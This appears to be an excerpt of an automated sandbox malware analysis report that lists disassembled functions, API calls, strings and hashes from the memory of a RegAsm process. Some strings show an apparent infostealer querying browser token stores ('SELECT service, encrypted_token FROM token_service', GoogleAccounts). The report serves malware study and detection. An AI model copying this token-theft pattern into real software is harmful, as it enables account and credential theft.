DName::DName.LIBCMT ref: 00421251

Part of subcall function 0041EF1C: DName::doPchar.LIBCMT ref: 0041EF4D

UnDecorator::getScopedName.LIBCMT ref: 00421290
DName::operator+=.LIBCMT ref: 0042129A
DName::operator+=.LIBCMT ref: 004212A9
DName::operator+=.LIBCMT ref: 004212B5
DName::operator+=.LIBCMT ref: 004212C2

Strings

void, xrefs: 004212A1

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 3954f0074aeec540258901a2dadef534a39a842cdd88091b810e57b97d7c88bf
Instruction ID: 449cfe514c88b363fdd3ab63021342872f499c0cb7fdf8aca55a9a0fa2290178
Opcode Fuzzy Hash: 3954f0074aeec540258901a2dadef534a39a842cdd88091b810e57b97d7c88bf
Instruction Fuzzy Hash: 1011C671600248EFC709EF68D855FEE7BB0EB14305F44409AF406EB2E2DB789A85C769

Function 6C19CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C19CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C19CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C19D079

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: ab11c69b19131f0c50203edb3e541a39aec0fcac341c0591084ce51bb7569ba0
Instruction ID: db8b39ee02ddfc31098100635048c1f705cd185ebbf000fd000dfd6050d47a11
Opcode Fuzzy Hash: ab11c69b19131f0c50203edb3e541a39aec0fcac341c0591084ce51bb7569ba0
Instruction Fuzzy Hash: 2EC199B5A002199BDB20DF24CC80BDABBB4BB58308F1541A8E94DA7741E775EA95CF90

Function 6C1465D0 Relevance: 13.8, APIs: 4, Strings: 5, Instructions: 261COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C14670B
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C142B2C), ref: 6C14675E
EnterCriticalSection.KERNEL32(?), ref: 6C14678E
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C142B2C), ref: 6C1467E1

Strings

winUnmapfile1, xrefs: 6C146964
@&l, xrefs: 6C14662B, 6C146809
P&l, xrefs: 6C1468AA, 6C146944, 6C14696B
winUnmapfile2, xrefs: 6C14698B
winClose, xrefs: 6C1468C5

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: @&l$P&l$winClose$winUnmapfile1$winUnmapfile2
API String ID: 3168844106-467221456
Opcode ID: ae260e1501c75ce0e0d63d36edb84394cbc4f52574e382988ede9714545fa3df
Instruction ID: db1e7be05806124aa0e18f9f7f91d4f980d5daefe1ecee16ac438438113794e3
Opcode Fuzzy Hash: ae260e1501c75ce0e0d63d36edb84394cbc4f52574e382988ede9714545fa3df
Instruction Fuzzy Hash: 3CA19E76B01218CBDF089F64E8ADA6E3775FF0671DB148428ED06DB680DF34A852CB95

Function 6C152C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(332DA51B), ref: 6C152C5D

Part of subcall function 6C1B0D30: calloc.MOZGLUE ref: 6C1B0D50
Part of subcall function 6C1B0D30: TlsGetValue.KERNEL32 ref: 6C1B0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C152C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C152CE0

Part of subcall function 6C152E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C152CDA,?,00000000), ref: 6C152E1E
Part of subcall function 6C152E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C152E33
Part of subcall function 6C152E00: TlsGetValue.KERNEL32 ref: 6C152E4E
Part of subcall function 6C152E00: EnterCriticalSection.KERNEL32(?), ref: 6C152E5E
Part of subcall function 6C152E00: PL_HashTableLookup.NSS3(?), ref: 6C152E71
Part of subcall function 6C152E00: PL_HashTableRemove.NSS3(?), ref: 6C152E84
Part of subcall function 6C152E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C152E96
Part of subcall function 6C152E00: PR_Unlock.NSS3 ref: 6C152EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C152D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C152D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C152D3F
free.MOZGLUE(00000000), ref: 6C152D73
CERT_DestroyCertificate.NSS3(?), ref: 6C152DB8
free.MOZGLUE ref: 6C152DC8

Part of subcall function 6C153E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C153EC2
Part of subcall function 6C153E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C153ED6
Part of subcall function 6C153E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C153EEE
Part of subcall function 6C153E60: PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C153F02
Part of subcall function 6C153E60: PL_FreeArenaPool.NSS3 ref: 6C153F14
Part of subcall function 6C153E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C153F27

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: e540957f01033a2e575c9ed4d5aec35067ac407af1dcbaa5e0062c1717846652
Instruction ID: 8396d3fb873a71c2603e82213581c9509206d32bca016be156dcd0c1f1435f16
Opcode Fuzzy Hash: e540957f01033a2e575c9ed4d5aec35067ac407af1dcbaa5e0062c1717846652
Instruction Fuzzy Hash: 67510EB2A042159FEB01DF68DC88B6B77E5EFA4348F540428EC6983651E731E825CB92

Function 6C1B4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C1B536F,00000022,?,?,00000000,?), ref: 6C1B4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C1B4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C1B4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C1B4FAE
free.MOZGLUE(?), ref: 6C1B4FC8

Strings

%s=%s, xrefs: 6C1B4F89
%s=%c%s%c, xrefs: 6C1B4FA9

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: bc7b0d10c2e973d7ba40173560758188d0d699076e9fe184318da4b11e74b491
Instruction ID: 1090207b971cbefa5c130ea334fbac0017ffd0b87afcd9f8a18374fa23f9cbad
Opcode Fuzzy Hash: bc7b0d10c2e973d7ba40173560758188d0d699076e9fe184318da4b11e74b491
Instruction Fuzzy Hash: B0515671A0515A8BEB01CA6DC4907FFBBF59F52308F29C169F894B7A41D33D88058FA1

Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D

Strings

@, xrefs: 0040F977

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94

Function 004131B1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004131D0
StrCmpCA.SHLWAPI(00000000,004367CC), ref: 00413209
strtok_s.MSVCRT ref: 004132C9

Strings

8wA, xrefs: 004131C3, 004131C6

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: 8wA
API String ID: 3330995566-3030184717
Opcode ID: 1ca359befd034e3920ad822621f447cd472d2e5d2529f52721348d2f09a84340
Instruction ID: 649acba8467432bbd508249a7c5720da5076adc7ea819ddf261c33f32cd98693
Opcode Fuzzy Hash: 1ca359befd034e3920ad822621f447cd472d2e5d2529f52721348d2f09a84340
Instruction Fuzzy Hash: CE31A671A00101ABDB14AF64DC85FAABBA8AB18707F2150DBE805D61D5D77CCB898B4D

Function 6C168CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C17124D,00000001), ref: 6C168D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C17124D,00000001), ref: 6C168D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C17124D,00000001), ref: 6C168D73
PR_Unlock.NSS3(?,?,?,?,?,6C17124D,00000001), ref: 6C168D8C

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

PR_Unlock.NSS3(?,?,?,?,?,6C17124D,00000001), ref: 6C168DBA

Strings

KRAM, xrefs: 6C168D3E
KRAM, xrefs: 6C168CF9

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: f79055c82dda06c72a7425ee94748c37abd4805a07cd04604e73bf0e9182f28a
Instruction ID: 794bc56cd9c05f3c57970c175ec40555a21c4d56169c781dec992e35d629e67c
Opcode Fuzzy Hash: f79055c82dda06c72a7425ee94748c37abd4805a07cd04604e73bf0e9182f28a
Instruction Fuzzy Hash: 5C2191B1A046018FDB00EF7AC48466EB7F0FF56318F16896ADD9887B01D734D891CBA1

Function 6C224D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C224DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C224DE0

Strings

API call with %s database connection pointer, xrefs: 6C224DBD
misuse, xrefs: 6C224DD5
%s at line %d of [%.10s], xrefs: 6C224DDA
invalid, xrefs: 6C224DB8
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C224DCB

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a30e226d587f93011d90f2f168b3e927a46526009b85aec5c18ea4acfdf15ca4
Instruction ID: 78dcc7965fba1f6a997492bb09b3221f0989a56cb1125bcd46c982f069ce3038
Opcode Fuzzy Hash: a30e226d587f93011d90f2f168b3e927a46526009b85aec5c18ea4acfdf15ca4
Instruction Fuzzy Hash: CFF0E229F1567E6BD7009115CC21F8637954F0232AF8609E2FE086BEE2D60EA89882D1

Function 6C224DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C224E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C224E4D

Strings

API call with %s database connection pointer, xrefs: 6C224E2A
misuse, xrefs: 6C224E42
%s at line %d of [%.10s], xrefs: 6C224E47
invalid, xrefs: 6C224E25
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C224E38

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: f76f51b9fe6c94935a2be2f114505a866e8615e1669196b2148510e158254af7
Instruction ID: 3634292f42612875ef226e19d6fa28b397d15295b5ec356eeec9162b8d7604f3
Opcode Fuzzy Hash: f76f51b9fe6c94935a2be2f114505a866e8615e1669196b2148510e158254af7
Instruction Fuzzy Hash: E2F02721F4592D2BF71490299C20F8737854B0132AF4944B1FE0C6BEE2D70D9C6842D1

Function 00409A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409BB2

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,0041688A,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
lstrlenA.KERNEL32(?), ref: 00409C7E
lstrlenA.KERNEL32(?), ref: 00409C99

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Strings

GoogleAccounts, xrefs: 00409A37
SELECT service, encrypted_token FROM token_service, xrefs: 00409B1F
GoogleAccounts, xrefs: 00409A8E
AccountId, xrefs: 00409BC9

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: fcc7e65687faa51bd9e447aa73caa771a3663574584f23c94eac61b10ca7dec5
Instruction ID: 077e962185e588e3aa0c0bda4535d36411cee809ea25196caad9eed7d65c29b7
Opcode Fuzzy Hash: fcc7e65687faa51bd9e447aa73caa771a3663574584f23c94eac61b10ca7dec5
Instruction Fuzzy Hash: 97814F72E00109ABCF11FBA5DE469DD7775AF04309F501026F900B71E2DBB8AE898B99

Function 6C190C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C191444,?,00000001,?,00000000,00000000,?,?,6C191444,?,?,00000000,?,?), ref: 6C190CB3

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?,?,6C191444,?), ref: 6C190DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?,?,6C191444,?), ref: 6C190DEC

Part of subcall function 6C1B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C152AF5,?,?,?,?,?,6C150A1B,00000000), ref: 6C1B0F1A
Part of subcall function 6C1B0F10: malloc.MOZGLUE(00000001), ref: 6C1B0F30
Part of subcall function 6C1B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C1B0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?), ref: 6C190DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C191444,?,00000001,?,00000000), ref: 6C190E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?), ref: 6C190E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?,?,6C191444,?,?,00000000), ref: 6C190E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C191444,?,00000001,?,00000000,00000000,?), ref: 6C190E79

Part of subcall function 6C1A1560: TlsGetValue.KERNEL32(00000000,?,6C170844,?), ref: 6C1A157A
Part of subcall function 6C1A1560: EnterCriticalSection.KERNEL32(?,?,?,6C170844,?), ref: 6C1A158F
Part of subcall function 6C1A1560: PR_Unlock.NSS3(?,?,?,?,6C170844,?), ref: 6C1A15B2

Part of subcall function 6C16B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C171397,00000000,?,6C16CF93,5B5F5EC0,00000000,?,6C171397,?), ref: 6C16B1CB
Part of subcall function 6C16B1A0: free.MOZGLUE(5B5F5EC0,?,6C16CF93,5B5F5EC0,00000000,?,6C171397,?), ref: 6C16B1D2

Part of subcall function 6C1689E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C1688AE,-00000008), ref: 6C168A04
Part of subcall function 6C1689E0: EnterCriticalSection.KERNEL32(?), ref: 6C168A15
Part of subcall function 6C1689E0: memset.VCRUNTIME140(6C1688AE,00000000,00000132), ref: 6C168A27
